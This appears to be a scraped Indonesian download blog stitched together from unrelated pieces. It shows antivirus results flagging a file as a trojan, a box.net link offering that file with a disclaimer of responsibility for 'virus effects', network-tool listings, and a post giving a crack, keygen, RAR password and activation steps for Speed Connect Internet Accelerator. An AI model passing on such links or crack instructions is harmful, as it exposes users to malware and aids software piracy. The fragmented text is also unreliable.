Sunbelt 3.9.2459.2 7291 2010-11-12 0.59 Trojan.Win32.Generic!BT
Symantec 1.3.0.24 20101111.002 2010-11-11 0.18 WM.Twno.B:Tw (2)
nProtect 20101108.01 9066740 2010-11-08 10.01 Trojan/W32.Scar.693120
The Hacker 6.7.0.1 v00082 2010-11-11 0.48 -
VBA32 3.12.14.2 20101111.0851 2010-11-11 3.43 Trojan.VBO.09970
VirusBuster 4.5.11.10 10.130.17/1997115 2010-11-11 2.40 TrojanSpy.Agent2.BTAU


Masih Ngeyel Juga ...
Untuk Downloadnya Klik http://www.box.net/shared/l77mfr957x




Untuk Efek Virus Bukan Tanggung Jawab Saya



PingTester adalah sebuah alat jaringan visual uji coba, dapat menyimpan daftar alamat IP, URL, dan uji jaringan perintah untuk meningkatkan efisiensi kerja, Ping Tester dapat melakukan verifikasi dengan satu klik. Dengan Ping Tester Anda dapat subnet 'ping menyapu' juga atau interval ping semua host pada daftar terus menerus, dan host Traceroute daftar pada saat yang sama, menyimpan catatan ping individu atau pelacak ke txt atau file Excel, dan Ping Tester adalah mampu menghasilkan laporan statistik yang dikumpulkan oleh interval waktu tertentu, sehingga Anda dapat mengetahui status koneksi jaringan setiap periode. Fungsi IP Scanner cepat dapat memindai kelompok IP untuk menemukan IP yang digunakan. Dan semua perintah DOS lainnya dapat berjalan dalam bentuk Windows. Pekerjaan ping test secara otomatis dapat berjalan pada waktu yang dijadwalkan. Penjadwalan otomatis termasuk hari-hari tertentu dalam seminggu, hari bulan, jam hari atau interval waktu yang diinginkan. Pemberitahuan e-mail memungkinkan Anda mengetahui status jaringan kapan saja dan dimana saja.

Ping Tester 9.32

  • Quick specs
  • Price: Free to try (15-day trial); $34.95 to buy
  • Operating system: Windows 3.x/95/98/Me/2000/XP/2003/Vista/NT
  • Date added: March 14, 2009
  • Total Downloads: 63,572
  • Downloads last week: 539
  • Product Ranking: #21 in Network Tools
  • See full specifications
Download Now (2.45MB)
Tested spyware free


ZoneAlarm Pro 2010 9.3.037

  • Quick specs
  • Price: Free to try (30-day trial); $39.95 to buy
  • Operating system: Windows 2000/XP/Vista/7
  • Date added: September 28, 2010
  • Total Downloads: 1,751,507
  • Downloads last week: 439
  • Product Ranking: #8 in Firewall Software
  • See full specifications

Download Now (47MB)
Tested spyware free



  •  

  • Posted by d60pc on August 2, 2008  |   Category : Internet  |   294,946 views  |  
    Speed Connect Internet AcceleratorTop internet accelerator (according to PC Magazine), a network settings optimizer to speed up your existing Dial-Up Modem, DSL, Cable, Wireless, LAN, High-speed internet connections.
    Speed connect internet accelerators telah mereleased version terbaru yaitu v7.5! Dengan penambahan fiture-fiture baru dan perbaikan yang makin membuat software ini bekerja dengan baik dan efektif. Menurut PC Magazine, saat ini program Speed Connect Internet Accelerator adalah salah satu program Internet Accelerator terbaik .
    SpeedConnect Internet Accelerator adalah software yang diciptakan untuk meng optimalkan koneksi internet dan mempercepat koneksi internet kita ketika browsing, membuka email, downloads, uploads, serta ketika bermain game secara online juga voice talk online.
    Features:
    • Optimizes all internet connection types
    • User friendly
    • Quick Optimizer option
    • Advanced Customization
    • Tool and Wizards
    • Load/Save Settings
    • Optimization Report
    • Connection Analyzer
    Benefits:
    • FASTER internet connection
    • Browse FASTER
    • Send and receive e-mail FASTER
    • Download and upload files FASTER
    • Play online games FASTER
    • Improve Skype connection
    • NO adware, NO hardware installation
    • NO service subscription, NO monthly fees
    • NO new hardware installation
    Speed Connect Internet Accelerator
    Dan features yang utama juga dari program ini adalah karena dalam mengoptimalkan koneksi internet kita dia bekerja dengan cepat, simple dan mudah (Wizards)
    Dari situs resminya “www.cbs-soft.com/register.htm” untuk dapat menggunakan software ini secara Full Version maka kita harus sedikit mengeluarkan dollar sebesar $ 29.95. Tapi di d60pc.com maka anda bisa mendapatkan dan menggunakan Software ini secara Full Versi karena sudah disiapkan Crack-a secara gratis untuk anda  ;)
    Speed Connect Internet Accelerator Setup Speed Connect Internet Accelerator v7.5 ( 1.9 Mb )
    Speed Connect Internet Accelerator Carck Speed Connect Internet Accelerator v7.5 ( 525 kb )
    Pass RAR : www.d60pc.net
    *** UPDATE ***
    Karena banyaknya comment dan pertanyaan dari member2 dan visitors dari d60pc website yang kesulitan dalam menginstall Software yang satu ini, maka saya akan update postingan ini dengan memberikan cara2 dalam proses penginstalannya ;)
    1. Download Program ini dari link diatas yang berupda : SpeedConnect75Setup.exe
    2. Download juga File Cra*k Kegen yang bisa anda download juga diatas
    3. Jalankan Proses Instalasi pada file SpeedConnect75Setup.exe sampai dengan finish
    4. Lalu pada File Crack-SpeedConnect75.rar, anda ekstrak terlebih dahulu dengan menggunakan password : www.d60pc.net
    5. Kemudian file yang terdapat didalamnya yaitu : SpeedConnect Internet Accelerator.exe dan SpeedConnectStartUp.exe dicopykan kedalam directory = C:\Program Files\CBS Software\SpeedConnect Internet Accelerator
    6. Kemudian jalankan file SpeedConnect Keygen.exe cara instal speed connect internet accelerator
    7. Isikan alamat email anda , lalu > Generate
    8. Jalankan Program SpeedConnect Internet Accelerator.exe yang sebelumnya sudah anda install
    9. Ketika pertama kali anda jalankan maka aka diminta untuk memasukkan Code Activatasi cara instal speed connect internet accelerator
    10. Masukkan data2 aktivasi yang telah kita buat sebelumnya tadi
    11. Lalu > Continue

    Total Tayangan Laman

    Translate